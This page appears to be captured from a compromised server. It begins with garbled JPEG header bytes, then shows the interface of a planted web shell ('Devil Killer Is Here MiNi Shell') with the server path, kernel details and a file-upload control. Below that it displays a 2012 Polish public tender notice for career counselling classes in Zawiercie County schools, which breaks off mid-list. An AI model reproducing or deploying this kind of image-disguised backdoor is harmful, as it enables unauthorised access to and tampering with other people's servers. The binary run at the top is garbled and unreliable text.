JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120425/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120425/132886-N-2012.html

<p class="kh_header"><b>Zawiercie: Przeprowadzenie zajęć z doradztwa zawodowego dla uczniów szkół ponadgimnazjalnych Powiatu Zawierciańskiego w roku szkolnym 2011/2012</b><br>
<b>Numer ogłoszenia: 132886 - 2012; data zamieszczenia: 25.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Zawierciański Starostwo Powiatowe , ul. Sienkiewicza 34, 42-400 Zawiercie, woj. śląskie, tel. 32 6710710-2 w. 551, faks 32 6721971.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zawiercie.powiat.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie zajęć z doradztwa zawodowego dla uczniów szkół ponadgimnazjalnych Powiatu Zawierciańskiego w roku szkolnym 2011/2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa przeprowadzenia zajęć z doradztwa zawodowego dla uczniów szkół ponadgimnazjalnych Powiatu Zawierciańskiego  w roku szkolnym 2011/2012.
Zamawiający dopuszcza możliwość składania ofert częściowych na wymienione  w niniejszej specyfikacji zakresy zamówienia:

Usługa grupowego doradztwa zawodowego na rzecz uczniów: 
-Zasadniczej Szkoły Zawodowej nr 2 wchodzącej w skład  Zespołu Szkół im. Józefa Bema w Zawierciu, 
-Zasadniczej Szkoły Zawodowej wchodzącej w skład Zespołu Szkół  w Szczekocinach,
-Zasadniczej Szkoły Zawodowej im. Jana Pawła II wchodzącej w skład  Zespołu Szkół Rolnicze Centrum Kształcenia Ustawicznego w Żarnowcu, 
w  grupie liczącej około 20 osób (nie mniej niż 15 nie więcej niż 25), w godzinach nie pokrywających się z godzinami zajęć lekcyjnych tych uczniów. Zakres zamówienia obejmuje grupowe doradztwo zawodowe na rzecz uczniów w wymiarze 24 godzin lekcyjnych ( po 45 minut każda ) świadczone w okresie maksymalnie 3  tygodni licząc od  dnia podpisania umowy. 

-Technikum nr 1 wchodzącego w skład  Zespołu Szkół  im. X. Dunikowskiego w Zawierciu, 
-Technikum Nr 2 wchodzącego w skład Zespołu Szkół im. H. Kołłątaja w Zawierciu,
-Technikum Nr 5 wchodzącego w skład   Zespołu Szkół im. gen. J. Bema w Zawierciu,
-Technikum Nr 4 wchodzącego w skład  Zespołu Szkół im. St. Staszica  w Zawierciu, 
-Technikum  w Zespole Szkół im. prof. R. Gostkowskiego w Łazach, 
-Technikum  w Zespole Szkół Rolnicze Centrum Kształcenia Ustawicznego w Żarnowcu, 
-Technikum Nr 3 wchodzącego w skład  Zespołu Szkół im. O. Langego w Zawierciu,
-Technikum im. M. Kopernika wchodzącego w skład Zespołu Szkół  w Porębie
w grupie liczącej około 20 osób ( nie mniej niż 15 nie więcej niż 25 ), w godzinach nie pokrywających się z godzinami zajęć szkolnych tych uczniów. Zakres zamówienia obejmuje grupowe doradztwo zawodowe na rzecz uczniów w wymiarze 24 godzin lekcyjnych (po 45 minut każda) świadczone w okresie maksymalnie 3 tygodni licząc od  dnia podpisania umowy. 
-Zasadniczej Szkoły Zawodowej Specjalnej nr 3 należącej do Zespołu Szkół Specjalnych  im. M. Grzegorzewskiej  w Zawierciu świadczonej w grupie liczącej około 14 osób w godzinach nie pokrywających się z godzinami zajęć szkolnych tych uczniów. Zakres zamówienia obejmuje grupowe doradztwo zawodowe na rzecz uczniów w wymiarze 24 godzin lekcyjnych (po 45 minut każda) świadczone w okresie maksymalnie 3  tygodni licząc od  dnia podpisania umowy

Łączna maksymalna liczba uczniów - 354.
Łączna maksymalna liczba grup - 18.
Liczba godzin konsultacji grupowych - 24 godziny na jedną grupę, ogółem maksymalnie 432 godzin.


Zakres 2

Usługa indywidualnego doradztwa zawodowego na rzecz uczniów: 
-Zasadniczej Szkoły Zawodowej nr 2 należących do Zespołu Szkół im. Józefa Bema- w Zawierciu
-Zasadniczej Szkoły Zawodowej  należących do Zespołu Szkół  w Szczekocinach
-Zasadnicza Szkoła Zawodowa im. Jana Pawła II  należących do Zespół Szkół Rolnicze Centrum Kształcenia Ustawicznego  w Żarnowcu
-Technikum nr 1 należących do Zespół Szkół  im. X. Dunikowskiego   w Zawierciu 
-Technikum Nr 2 należących do Zespół Szkół  im. H. Kołłątaja  w Zawierciu 
-Technikum Nr 5 należących do  Zespół Szkół im. gen. J. Bema w Zawierciu
-Technikum Nr 4 należących do Zespół Szkół  im. St. Staszica w Zawierciu
- Technikum  należących do Zespół Szkół im. prof. R. Gostkowskiego w Łazach
- Technikum należących do Zespół Szkół Rolnicze Centrum Kształcenia Ustawicznego w Żarnowcu
-Technikum Nr 3 należących do Zespól Szkół im. O. Langego w Zawierciu 
-Technikum im. M. Kopernika należących do Zespół Szkół  w Porębie 
-Zasadniczej Szkoły Zawodowej Specjalnej nr 3 należącej do Zespołu Szkół Specjalnych  im. M. Grzegorzewskiej  w Zawierciu 


Łączna maksymalna liczba uczniów, którzy zostaną wyłonieni z konsultacji grupowych - 284.
Liczba godzin konsultacji indywidualnych - 9 godzin na jednego ucznia, ogółem maksymalna liczba godzin 2.556.

3.Informacje dotyczące zakresów:

Zakres 1:
Zajęcia z doradztwa grupowego obejmować będą problematykę z zakresu poruszania się po rynku pracy (m.in. zasady pisania CV i listu motywacyjnego, przygotowanie do rozmowy kwalifikacyjnej, gry symulacyjne), podstaw przedsiębiorczości, stereotypów płci, zasad równości, równouprawnienia i przykładów dyskryminacji na rynku pracy.
Doradztwo grupowe będzie prowadzone w oparciu o materiały dydaktyczne przekazane przez Zamawiającego tj. podręcznik doradcy- konsultanta zawodowego.
W ramach ostatnich zajęć z doradztwa grupowego konsultant przeprowadzi z uczestnikami ankiety zgodnie ze wzorem przekazanym przez Zamawiającego; wypełnione przez uczestników ankiety Wykonawca przekaże Zamawiającemu.
Wykonawca zobowiązany jest do przedłożenia Zamawiającemu podpisanych przez uczestników list obecności na zajęciach z doradztwa grupowego (wzór listy Zamawiający przekaże Wykonawcy) niezwłocznie po wykonaniu usługi. Listy obecności oraz wypełnione przez uczestników ankiety będą stanowiły podstawę stwierdzenia realizacji zamówienia. 

W celu przeprowadzenia zajęć Zamawiający zapewni konsultantowi zawodowemu bezpłatnie sale wykładowe znajdujące się w Zespole Szkół wskazanym w opisie zakresu zamówienia, które Wykonawca będzie realizował. Wykonawca pokrywa koszty dojazdu do sal wykładowych oraz wszelkie inne koszty związane ze świadczeniem usług w tym wydruki materiałów. 


Zakres 2:
1)Indywidualne zajęcia z doradcą mają na celu ukierunkować ucznia na rozwój zawodowy i pomóc mu opracować Indywidualny  Plan Rozwoju Zawodowego. Na podstawie zdiagnozowanych przez konsultanta potrzeb uczniowie będą kierowani na odpowiednie do swoich predyspozycji, oczekiwań i potrzeb formy wsparcia w ramach pakietu wsparcia zaplanowanego w projekcie Mam zawód - mam pracę w regionie (tj. m.in. kursy, zajęcia pozalekcyjne, zajęcia wyrównawcze , staże i praktyki, wizyty studyjne).
2)Doradztwo indywidualne będzie prowadzone w oparciu o materiały dydaktyczne przekazane przez Zamawiającego tj. podręcznik doradcy/ konsultanta zawodowego. 
3)W ramach zajęć z doradztwa indywidualnego konsultant wspólnie z uczniem opracuje jego Indywidualny Plan Rozwoju Zawodowego, który Wykonawca przekaże Zamawiającemu.
4)Wykonawca zobowiązany będzie także do niezwłocznego przedłożenia Zamawiającemu podpisanych przez uczestników list obecności na zajęciach  z doradztwa indywidualnego (wzór listy Zamawiający przekaże Wykonawcy). Listy obecności oraz Indywidualne Plany Rozwoju Zawodowego będą stanowiły podstawę stwierdzenia realizacji zamówienia. 
5)Zamawiający zastrzega możliwość nieruchomienia 50% zamówienia tj. zmniejszenia liczby osób objętych indywidualnym doradztwem zawodowym. W przypadku zmiany liczby osób objętych indywidualnym doradztwem zawodowym Zamawiający zapłaci za faktyczną liczbę godzin lekcyjnych indywidualnego doradztwa zawodowego. Cena jednostkowa za usługę (tj. cena za godzinę lekcyjną doradztwa) nie ulegnie zmianie a Wykonawca nie wniesie żadnych roszczeń w stosunku do Zamawiającego. W takim przypadku rozliczenie nastąpi zgodnie z rzeczywistym wykonaniem przedmiotu umowy tj. na podstawie list obecności oraz Indywidualnych Planów Rozwoju Zawodowego. 
6)Grupa uczniów będących odbiorcami doradztwa indywidualnego zostanie wyłoniona z grupy uczniów będących uczestnikami zajęć doradztwa grupowego. Zamawiający przewiduje wyłonić maksymalnie 284 uczniów. Każdy z nich będzie miał możliwość skorzystania z 9 godzin lekcyjnych doradztwa indywidualnego w okresie 3 tygodni licząc od dnia zakończenia zajęć w ramach doradztwa grupowego (o czym Zamawiający poinformuje pisemnie). Zajęcia z doradztwa indywidualnego nie będą mogły się odbywać w czasie trwania zajęć szkolnych ucznia.
7)Zamawiający może doprecyzować dni tygodnia, dni robocze czy wolne od pracy itp., przedział godzin np. nie wcześniej niż od godz. 12.00 i nie później niż do godziny 19.00
8)Do przeprowadzenia zajęć Zamawiający udostępni konsultantowi zawodowemu bezpłatnie sale wykładowe znajdujące się w Zespole Szkół wskazanym w opisie zakresu zamówienia, które Wykonawca będzie realizował. Wykonawca pokrywa koszty dojazdu do sal wykładowych oraz wszelkie inne koszty związane ze świadczeniem usługi w tym wydruki materiałów..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wpis do rejestru podmiotów prowadzących agencję zatrudnienia, prowadzonego zgodnie z art. 18 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2008 r. Nr 69, poz. 415 z późn. zm.) - dotyczy podmiotów prowadzących działalność gospodarczą w zakresie świadczenia usług pośrednictwa pracy, doradztwa personalnego, poradnictwa zawodowego i pracy tymczasowej.
Ocena spełniania warunków udziału w postępowaniu, zostanie dokonana według formuły: spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów, wymienionych w pkt VI SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz wykonanych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że te usługi zostały lub są wykonywane należycie (załącznik nr 6 do SIWZ) - z uwzględnieniem spełniania warunku szczegółowego, tj. W przypadku składania ofert dla zakresu nr 1:
- co najmniej jedną usługę grupowego doradztwa zawodowego w łącznym wymiarze nie mniejszym niż 50 godzin lekcyjnych warsztatów grupowych w podziale na grupy obejmujące łącznie minimum 20 osób, z których każda polegała na przeprowadzeniu doradztwa zawodowego w tożsamym zakresie lub w zakresie podobnym do zakresu zamówienia; 
W przypadku składania ofert dla zakresu nr 2:
-  co najmniej jedną usługę indywidualnego doradztwa zawodowego w łącznym wymiarze nie mniejszym niż 50 godzin lekcyjnych, z których każda polegała na przeprowadzeniu doradztwa zawodowego w tożsamym zakresie lub w zakresie podobnym do zakresu zamówienia; 

Ocena spełniania warunków udziału w postępowaniu, zostanie dokonana według formuły: spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów, wymienionych w pkt VI SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składa oświadczenie o spłenieniu warunków z art. 22 ust. 1 
Ocena spełniania warunków udziału w postępowaniu, zostanie dokonana według formuły: spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów, wymienionych w pkt VI SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych i doświadczenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami wraz z oświadczeniem, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia (załącznik nr 5 do SIWZ) - z uwzględnieniem spełniania warunku szczegółowego,tj. W przypadku składania ofert dla zakresu nr 1:
minimum 10 osobami zdolnymi do wykonania zamówienia, posiadającymi niżej opisane kwalifikacje:
a)	ukończone studia magisterskie lub licencjackie w zakresie doradztwa zawodowego 
lub
b)	posiada ukończone studia magisterskie na dowolnym kierunku i ukończone studia podyplomowe w zakresie doradztwa zawodowego oraz posiada przygotowanie pedagogiczne, tj. kwalifikacje o których mowa w § 22 ust. 1 rozporządzenia ministra edukacji narodowej z dnia 12 marca 2009 roku w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz.U. z 2009 r. nr 50 poz. 400),
lub
c)	jest doradcą zawodowym lub doradcą zawodowym I stopnia lub doradcą zawodowym II stopnia w rozumieniu art. 94 ustawy z dnia 20 kwietnia 2004 roku o promocji zatrudnienia i instytucjach rynku pracy (t. j. Dz.U z 2008 r. Nr 69 poz.415 z późn. zm.).

w tym 1 osobą posiadającą niżej opisane kwalifikacje do przeprowadzenia zajęć z zakresu doradztwa zawodowego grupowego w Zasadniczej Szkole Zawodowej Specjalnej nr 3 należącej do Zespołu Szkół Specjalnych  im. M. Grzegorzewskiej  w Zawierciu, 
a) ukończone studia magisterskie lub licencjackie w zakresie doradztwa zawodowego 
      lub
b)	posiada ukończone studia magisterskie na dowolnym kierunku i ukończone studia podyplomowe w zakresie doradztwa zawodowego oraz posiada przygotowanie pedagogiczne, tj. kwalifikacje o których mowa w § 22 ust. 1 rozporządzenia ministra edukacji narodowej z dnia 12 marca 2009 roku w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz.U. z 2009 r. nr 50 poz. 400),
c)	studia podyplomowe lub kurs kwalifikacyjny w zakresie pedagogiki specjalnej odpowiedniej do niepełnosprawności uczniów lub rodzaju placówki, tj. kwalifikacje o których mowa w § 22 ust. 3  rozporządzenia ministra edukacji narodowej z dnia 12 marca 2009 roku w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz.U. 2009 nr 50 poz. 400)
      lub
d)	jest doradcą zawodowym lub doradcą zawodowym I stopnia lub doradcą zawodowym II stopnia w rozumieniu art. 94 ustawy z dnia 20 kwietnia 2004 roku o promocji zatrudnienia i instytucjach rynku pracy (t. j. Dz.U z 2008 r. Nr 69 poz.415 z późn. zm.).

W przypadku składania ofert dla zakresu nr 2:
minimum 20 osobami zdolnymi do wykonania zamówienia, posiadającymi niżej opisane kwalifikacje:

a)	ukończone studia magisterskie lub licencjackie w zakresie doradztwa zawodowego 
      lub
b)	posiada ukończone studia magisterskie na dowolnym kierunku i ukończone studia podyplomowe w zakresie doradztwa zawodowego oraz posiada przygotowanie pedagogiczne, tj. kwalifikacje o których mowa w § 22 ust. 1 rozporządzenia ministra edukacji narodowej z dnia 12 marca 2009 roku w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz.U. z 2009 r. nr 50 poz. 400),
      lub
c)	jest doradcą zawodowym lub doradcą zawodowym I stopnia lub doradcą zawodowym II stopnia w rozumieniu art. 94 ustawy z dnia 20 kwietnia 2004 roku o promocji zatrudnienia i instytucjach rynku pracy (t. j. Dz.U z 2008 r. Nr 69 poz.415 z późn. zm.).

w tym 2 osobami posiadającymi niżej opisane kwalifikacje do przeprowadzenia zajęć z zakresu doradztwa zawodowego indywidualnego w Zasadniczej Szkole Zawodowej Specjalnej nr 3 należącej do Zespołu Szkół Specjalnych  im. M. Grzegorzewskiej  w Zawierciu, 
a) ukończone studia magisterskie lub licencjackie w zakresie doradztwa zawodowego 
b)	posiada ukończone studia magisterskie na dowolnym kierunku i ukończone studia podyplomowe w zakresie doradztwa zawodowego oraz posiada przygotowanie pedagogiczne, tj. kwalifikacje o których mowa w § 22 ust. 1 rozporządzenia ministra edukacji narodowej z dnia 12 marca 2009 roku w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz.U. z 2009 r. nr 50 poz. 400),
c)	studia podyplomowe lub kurs kwalifikacyjny w zakresie pedagogiki specjalnej odpowiedniej do niepełnosprawności uczniów lub rodzaju placówki, tj. kwalifikacje o których mowa w § 22 ust. 3  rozporządzenia ministra edukacji narodowej z dnia 12 marca 2009 roku w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz.U. 2009 nr 50 poz. 400)
lub
d)	jest doradcą zawodowym lub doradcą zawodowym I stopnia lub doradcą zawodowym II stopnia w rozumieniu art. 94 ustawy z dnia 20 kwietnia 2004 roku o promocji zatrudnienia i instytucjach rynku pracy (t. j. Dz.U z 2008 r. Nr 69 poz.415 z późn. zm.).
Ocena spełniania warunków udziału w postępowaniu, zostanie dokonana według formuły: spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów, wymienionych w pkt VI SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składa oświadczenie o spłenieniu warunków z art. 22 ust. 1 
Ocena spełniania warunków udziału w postępowaniu, zostanie dokonana według formuły: spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów, wymienionych w pkt VI SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
